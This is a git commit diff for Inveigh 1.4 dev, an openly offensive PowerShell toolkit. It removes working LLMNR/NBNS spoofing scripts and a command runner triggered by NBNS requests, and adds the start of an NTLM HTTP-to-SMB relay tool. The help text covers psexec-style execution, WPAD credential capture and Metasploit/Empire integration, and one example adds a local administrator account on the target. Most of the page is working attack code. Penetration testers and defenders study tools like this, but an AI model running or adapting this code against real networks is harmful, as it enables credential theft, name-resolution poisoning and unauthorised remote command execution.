aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorKevin Robertson <robertsonk@gmail.com>2018-02-19 23:36:13 -0500
committerKevin Robertson <robertsonk@gmail.com>2018-02-19 23:36:13 -0500
commit43edf71b54567698d24d7c44ce3410120841b53a (patch)
tree978bae559d6ec42f76c1168f125704132e755b59
parent32550b99a7f8e8006f16d185e9d6f40fe4b3d9ea (diff)
downloadInveigh-43edf71b54567698d24d7c44ce3410120841b53a.tar.gz
Inveigh-43edf71b54567698d24d7c44ce3410120841b53a.zip
Inveigh 1.4 dev
This is an early version of Inveigh 1.4. There is probably alot that is broken. Inveigh: 1. Invoke-DNSUpdate integration - Inveigh will attempt to inject DNS records if the same LLMNR/NBNS request is observed from multiple systems. The goal is to find requests that could be valid in other subnets and leverage them through DNS. This version requires that Inveigh is running with a domain auth user context. 2. Reworked output system and formating. 3. hmm...I forget. Inveigh Relay: 1. New attack with Invoke-TheHash integration - In addition to that standard psexec style attack, Inveigh Relay now has the ability to create and maintain authenticated priv and unpriv SMB2 sessions. These sessions can be used by Invoke-SMBClient (attack file shares) and Invoke-SMBExec. Invoke-InveighRelay -Attack session -Target 10.10.10.10 wait for relay Get-Inveigh -session Invoke-SMBClient -Session 0 -Source \\10.10.10.10\share 2. Multitarget - Inveigh Relay will now accept an array of targets. As relay attempts come in, Inveigh Relay will attempt to select the best target (still needs work). 3. SMB signing check for targets on startup. 4. Reworked output system and formating. I'm temporarily housing newer versions of Invoke-DNSUpdate, Invoke-SMBClient, and Invoke-SMBExec here. They need to be imported into the same powershell session for integration to work. There is also probably a lot broken with these.
Diffstat
-rw-r--r--Extras/Invoke-NBNSC2.ps1151
-rw-r--r--Extras/Send-LLMNRResponse.ps187
-rw-r--r--Extras/Send-NBNSResponse.ps1105
-rw-r--r--Inveigh-Relay.ps14677
-rw-r--r--Inveigh.ps1 (renamed from Scripts/Inveigh.ps1)1605
-rw-r--r--Inveigh.psd12
-rw-r--r--Inveigh.psm16
-rw-r--r--Invoke-DNSUpdate.ps11437
-rw-r--r--Invoke-SMBClient.ps12773
-rw-r--r--Invoke-SMBExec.ps12777
-rw-r--r--Scripts/Inveigh-Relay.ps14516
11 files changed, 12399 insertions, 5737 deletions
diff --git a/Extras/Invoke-NBNSC2.ps1 b/Extras/Invoke-NBNSC2.ps1
deleted file mode 100644
index 41d2e64..0000000
--- a/Extras/Invoke-NBNSC2.ps1
+++ /dev/null
@@ -1,151 +0,0 @@
-function Invoke-NBNSC2
-{
-<#
-.SYNOPSIS
-Invoke-NBNSC2 will listen for NBNS requests and execute set commands if requests for specific hostnames are
-received. The function must be supplied with an even number of Hostnames and Commands. NBNS requests can be
-sent from a NBNS enabled system on the same subnet using ping, etc.
-
-.PARAMETER Hostnames
-A comma separated list of Hostnames that will trigger a corresponding command. The first hostname trigger a command
-from the Commands array with a matching index (e.g. Hostnames[0] executes Commands[0]).
-
-.PARAMETER Commands
-An array of commands stored in scriptblock format. All commands must be enclosed in {} brackets.
-
-.PARAMETER ExitHostname
-Specify a hostname that will cause the function to exit. This hostname must not match a hostname used in Hostnames.
-
-.PARAMETER RunTime
-(Integer) Set the run time duration.
-
-.PARAMETER RunTimeUnit
-Default = Minutes: Set the time unit for RunTime to either Minutes, Hours, or Days.
-
-.EXAMPLE
-Send-NBNSC2 -Hostnames test1,test2 -Command {calc},{notepad} -RunTime 1 -RunTimeUnit Days
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$true)][Array]$Hostnames = "",
-[parameter(Mandatory=$true)][Array]$Commands = "",
-[parameter(Mandatory=$true)][String]$ExitHostname = "",
-[parameter(Mandatory=$false)][Int]$RunTime="",
-[parameter(Mandatory=$false)][ValidateSet("Minutes","Hours","Days")][String]$RunTimeUnit="Minutes",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if($Hostnames.Count -ne $Commands.Count)
-{
- throw "Must use an equal number of Hostnames and Commands."
-}
-elseif($Hostnames -contains $ExitHostname)
-{
- throw "ExitHostname cannot be used as in Hostnames."
-}
-
-if($RunTime)
-{
- if($RunTimeUnit -like 'Minutes')
- {
- $runtime_timeout = new-timespan -Minutes $RunTime
- }
- elseif($RunTimeUnit -like 'Hours')
- {
- $runtime_timeout = new-timespan -Hours $RunTime
- }
- elseif($RunTimeUnit -like 'Days')
- {
- $runtime_timeout = new-timespan -Days $RunTime
- }
-
- $runtime_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-}
-
-$Hostnames = $Hostnames | % {$_.ToUpper()}
-$running = $true
-$NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
-$NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
-$NBNS_UDP_client.Client.ReceiveTimeout = 10000
-$control_timeout = new-timespan -Seconds 1
-$control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
-
-while($running)
-{
- try
- {
- $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint)
- }
- catch
- {
- $NBNS_request_data = $null
- }
-
- if($NBNS_request_data)
- {
- $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
- $NBNS_query = $NBNS_query -replace "-00",""
- $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
- $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
- $NBNS_query_string_subtracted = ""
- $NBNS_query_string = ""
- $n = 0
-
- if($NBNS_query_string_encoded.Length -gt 1)
- {
- do
- {
- $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
- $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
- $n += 1
- }
- until($n -gt ($NBNS_query_string_encoded.Length - 1))
-
- $n = 0
-
- do
- {
- $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
- $n += 2
- }
- until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
- }
-
- if([Array]::IndexOf($Hostnames,$NBNS_query_string) -ge 0 -and $control_stopwatch.Elapsed -ge $control_timeout)
- {
- $NBNS_UDP_client.Close()
- $command_index = [Array]::IndexOf($Hostnames,$NBNS_query_string)
- $NBNS_query_string = ''
- & $Commands[$command_index]
- $control_timeout = new-timespan -Seconds 5
- $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
- $NBNS_UDP_client.Client.ReceiveTimeout = 10000
- }
- elseif($ExitHostname -like $NBNS_query_string)
- {
- $running = $false
- }
- }
-
- if($RunTime -and $runtime_stopwatch.Elapsed -ge $runtime_timeout)
- {
- $running = $false
- }
-
-}
-
-$NBNS_UDP_client.Close()
-
-} \ No newline at end of file
diff --git a/Extras/Send-LLMNRResponse.ps1 b/Extras/Send-LLMNRResponse.ps1
deleted file mode 100644
index cc22091..0000000
--- a/Extras/Send-LLMNRResponse.ps1
+++ /dev/null
@@ -1,87 +0,0 @@
-
-function Send-LLMNRResponse
-{
-<#
-.SYNOPSIS
-Send-LLMNRResponse sends a crafted LLMNR response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, TargetPort, Hostname, and TransactionID must match a very (very very) recent LLMNR request.
-You must have an external method (wireshark,etc) of viewing the required LLMNR request fields for traffic on the
-target subnet. The odds of pulling this attack off manually are slim if not impossible due to the narrow response
-window. Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER LLMNRTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = Random Available: Specify a source port for the LLMNR response. Note that the standard port is 5355
-which will cause a binding conflict if LLMNR is enabled on the host system. A random port seems to work fine.
-
-.PARAMETER SpooferIP
-Specify an IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-Specify an IP address to target for the LLMNR response.
-
-.PARAMETER TargetPort
-Specify an port to target for the LLMNR response. This port must match the source port included in the request.
-
-.EXAMPLE
-Send-LLMNRResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$true)][Int]$TargetPort="",
-[parameter(Mandatory=$false)][Int]$SendPort="0",
-[parameter(Mandatory=$false)][Int]$LLMNRTTL="30",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$hostname_bytes = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
-[Array]::Reverse($LLMNR_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split('-') | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-$LLMNR_response_packet = $Transaction_ID_bytes +
- 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $hostname_bytes.Count +
- $hostname_bytes +
- 0x00,0x00,0x01,0x00,0x01 +
- $LLMNR_TTL_bytes +
- 0x00,0x04 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,$TargetPort)
-$send_socket.Connect($destination_point)
-$send_socket.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
-$send_socket.Close()
-} \ No newline at end of file
diff --git a/Extras/Send-NBNSResponse.ps1 b/Extras/Send-NBNSResponse.ps1
deleted file mode 100644
index 3d5ed02..0000000
--- a/Extras/Send-NBNSResponse.ps1
+++ /dev/null
@@ -1,105 +0,0 @@
-
-function Send-NBNSResponse
-{
-<#
-.SYNOPSIS
-Send-NBNSResponse sends a crafted NBNS response packet to a specific target. For name resolution to be successful,
-the specified TargetIP, Hostname, and TransactionID must match a very (very very) recent NBNS request. You must
-have an external method (wireshark,etc) of viewing the required NBNS request fields for traffic on the target
-subnet. The odds of pulling this attack off manually are slim due to the narrow response window. I've only been
-able to get it to work manually by watching tshark with the the transaction ID being listed in the output.
-Ideally, this function would be fed by another script.
-
-.PARAMETER Hostname
-Default = WPAD: Specify a hostname for NBNS spoofing.
-
-.PARAMETER NBNSTTL
-Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet.
-
-.PARAMETER SendPort
-Default = 137: Specify a source port for the NBNS response.
-
-.PARAMETER SpooferIP
-IP address for NBNS spoofing. This parameter is only necessary when redirecting victims to a system
-other than the function host.
-
-.PARAMETER TargetIP
-IP address to target for the NBNS response.
-
-.PARAMETER TransactionID
-NBNS transaction ID that matches the transaction from the NBNS request.
-
-.EXAMPLE
-Send-NBNSResponse -Target 192.168.1.11 -Hostname test -TransactionID 9c9e
-
-.LINK
-https://github.com/Kevin-Robertson/Inveigh
-#>
-
-
-[CmdletBinding()]
-param
-(
-[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="",
-[parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$TargetIP="",
-[parameter(Mandatory=$true)][ValidatePattern('^[A-Fa-f0-9]{4}$')][String]$TransactionID="",
-[parameter(Mandatory=$true)][String]$Hostname = "",
-[parameter(Mandatory=$false)][Int]$SendPort="137",
-[parameter(Mandatory=$false)][Int]$NBNSTTL="165",
-[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
-)
-
-if ($invalid_parameter)
-{
- throw "$($invalid_parameter) is not a valid parameter."
-}
-
-if(!$SpooferIP)
-{
- $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
-}
-
-$Hostname = $Hostname.ToUpper()
-
-$hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
- 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
-
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($Hostname)
-$hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
-$hostname_encoded = $hostname_encoded.Replace("-","")
-$hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
-$NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
-[Array]::Reverse($NBNS_TTL_bytes)
-$Transaction_ID_encoded = $TransactionID.Insert(2,'-')
-$Transaction_ID_bytes = $Transaction_ID_encoded.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
-for($i=0; $i -lt $hostname_encoded.Count; $i++)
-{
-
- if($hostname_encoded[$i] -gt 64)
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 10
- }
- else
- {
- $hostname_bytes[$i] = $hostname_encoded[$i] + 17
- }
-
-}
-
-$NBNS_response_packet = $Transaction_ID_bytes +
- 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
- $hostname_bytes +
- 0x00,0x20,0x00,0x01 +
- $NBNS_TTL_bytes +
- 0x00,0x06,0x00,0x00 +
- ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
- 0x00,0x00,0x00,0x00
-
-$send_socket = New-Object System.Net.Sockets.UdpClient($SendPort)
-$destination_IP = [System.Net.IPAddress]::Parse($TargetIP)
-$destination_point = New-Object Net.IPEndpoint($destination_IP,137)
-$send_socket.Connect($destination_point)
-$send_socket.Send($NBNS_response_packet,$NBNS_response_packet.Length)
-$send_socket.Close()
-} \ No newline at end of file
diff --git a/Inveigh-Relay.ps1 b/Inveigh-Relay.ps1
new file mode 100644
index 0000000..49c5629
--- /dev/null
+++ b/Inveigh-Relay.ps1
@@ -0,0 +1,4677 @@
+function Invoke-InveighRelay
+{
+<#
+.SYNOPSIS
+Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
+
+.DESCRIPTION
+Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB1/SMB2 relay with psexec style command execution.
+
+ HTTP/HTTPS to SMB NTLMv2 relay with granular control
+ Supports SMB1 and SMB2 targets
+ Does not require priveleged access on the Invoke-InveighRelay host
+ The Invoke-InveighRelay host can be targeted for privilege escalation
+ NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
+ Granular control of console and file output
+
+.PARAMETER Attack
+Default = Execute: (Execute/Session) Attack to perform with relay. Execute performs PSExec style command execution.
+Session creates and maintains autneticated SMB sessions that can be interacted with through Invoke-TheHash's
+Invoke-SMBClient and Invoke-SMBExec.
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target.
+
+.PARAMETER Command
+Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Low/Medium/Y/N) Enable/Disable real time console output. If using this option through a
+shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output.
+
+.PARAMETER ConsoleQueueLimit
+Default = Unlimited: Maximum number of queued up console log entries when not using the real time console.
+
+.PARAMETER ConsoleStatus
+(Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for
+displaying full capture lists when running through a shell that does not have access to the support functions.
+
+.PARAMETER ConsoleUnique
+Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
+and username combinations when real time console output is enabled.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER FileOutputDirectory
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPIP
+Default = Any: IP address for the HTTP/HTTPS listener.
+
+.PARAMETER HTTPPort
+Default = 80: TCP port for the HTTP listener.
+
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store. If the script does not exit gracefully, manually remove the certificate. This feature requires
+local administrator access.
+
+.PARAMETER HTTPSPort
+Default = 443: TCP port for the HTTPS listener.
+
+.PARAMETER HTTPSCertIssuer
+Default = Inveigh: The issuer field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSCertSubject
+Default = localhost: The subject field for the cert that will be installed for HTTPS.
+
+.PARAMETER HTTPSForceCertDelete
+Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and
+HTTPSCertSubject.
+
+.PARAMETER HTTPResetDelay
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
+chance of capturing/relaying authentication through a popup box with some browsers (Firefox).
+
+.PARAMETER HTTPResetDelayTimeout
+Default = 30 Seconds: HTTPResetDelay timeout in seconds.
+
+.PARAMETER LogOutput
+Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
+
+.PARAMETER ProxyRelay
+Default = Disabled: (Y/N): Enable/Disable relaying proxy authentication.
+
+.PARAMETER ProxyIP
+Default = Any: IP address for the proxy listener.
+
+.PARAMETER ProxyPort
+Default = 8182: TCP port for the proxy listener.
+
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
+.PARAMETER RelayAutoDisable
+Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
+target.
+
+.PARAMETER RelayAutoExit
+Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error.
+
+.PARAMETER RunTime
+(Integer) Run time duration in minutes.
+
+.PARAMETER Service
+Default = 20 Character Random: Name of the service to create and delete on the target.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER SMB1
+(Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the
+target.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER Target
+IP address of system to target for SMB relay.
+
+.PARAMETER Tool
+Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
+
+.PARAMETER Username
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous/NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER WPADAuthIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
+popups for authenticated wpad.dat requests such as Firefox.
+
+.EXAMPLE
+Invoke-Inveigh -HTTP N
+Invoke-InveighRelay -Target 192.168.2.55 -Command "net user Inveigh Spring2017 /add && net localgroup administrators Inveigh /add"
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+# Parameter default values can be modified in this section:
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
+ [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
+ [parameter(Mandatory=$false)][Array]$Username = "",
+ [parameter(Mandatory=$false)][Array]$UsernameAlwaysAllow = "Administrator",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
+ [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+ [parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
+ [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
+ [parameter(Mandatory=$false)][Int]$ProxyPort = "8492",
+ [parameter(Mandatory=$false)][Int]$RunTime = "",
+ [parameter(Mandatory=$false)][Int]$SessionLimit = "2",
+ [parameter(Mandatory=$false)][Int]$SessionRefresh = "10",
+ [parameter(Mandatory=$false)][Object]$Source,
+ [parameter(Mandatory=$false)][String]$Command = "",
+ [parameter(Mandatory=$false)][String]$HTTPSCertIssuer = "Inveigh",
+ [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost",
+ [parameter(Mandatory=$false)][String]$Service,
+ [parameter(Mandatory=$true)][Array]$Target = "",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoDisable = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$RelayAutoExit = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SessionPriority = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SigningCheck = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N",
+ [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+ [parameter(Mandatory=$false)][ValidateSet("Session","Execute")][String]$Attack = "Execute",
+ [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+ [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
+ [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Switch]$SMB1,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+ Write-Output "[-] $($invalid_parameter) is not a valid parameter."
+ throw
+}
+
+$inveigh_version = "1.4 Dev"
+
+if($ProxyIP -eq '0.0.0.0')
+{
+ $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+}
+
+if($Attack -eq 'Execute' -and !$Command)
+{
+ Write-Output "[-] -Command requiried with -Attack Execute"
+ throw
+}
+
+if(!$FileOutputDirectory)
+{
+ $output_directory = $PWD.Path
+}
+else
+{
+ $output_directory = $FileOutputDirectory
+}
+
+if(!$inveigh)
+{
+ $global:inveigh = [HashTable]::Synchronized(@{})
+ $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+ $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+ $inveigh.log = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_list = New-Object System.Collections.ArrayList
+ $inveigh.relay_list = New-Object System.Collections.ArrayList
+ $inveigh.relay_user_failed_list = New-Object System.Collections.ArrayList
+ $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_list = @()
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
+}
+
+if($inveigh.relay_running)
+{
+ Write-Output "[-] Inveigh Relay is already running"
+ throw
+}
+
+if(!$inveigh.running)
+{
+ $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_queue = New-Object System.Collections.ArrayList
+ $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+ $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.output_queue = New-Object System.Collections.ArrayList
+ $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.status_queue = New-Object System.Collections.ArrayList
+ $inveigh.console_input = $true
+ $inveigh.console_output = $false
+ $inveigh.file_output = $false
+ $inveigh.HTTPS_existing_certificate = $false
+ $inveigh.HTTPS_force_certificate_delete = $false
+ $inveigh.log_output = $true
+ $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+ $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+ $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+ $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+ $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt"
+}
+
+$inveigh.target_list = New-Object System.Collections.ArrayList
+
+ForEach($target_entry in $Target)
+{
+ $inveigh.target_list.Add($target_entry) > $null
+}
+
+if($StartupChecks -eq 'Y')
+{
+
+ $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+
+ if($HTTP -eq 'Y')
+ {
+ $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+ }
+
+ if($HTTPS -eq 'Y')
+ {
+ $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPSPort "
+ }
+
+ if($Proxy -eq 'Y')
+ {
+ $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
+ }
+
+}
+
+$inveigh.relay_running = $true
+$inveigh.SMB_relay = $true
+
+if($StatusOutput -eq 'Y')
+{
+ $inveigh.status_output = $true
+}
+else
+{
+ $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+ $inveigh.output_stream_only = $true
+}
+else
+{
+ $inveigh.output_stream_only = $false
+}
+
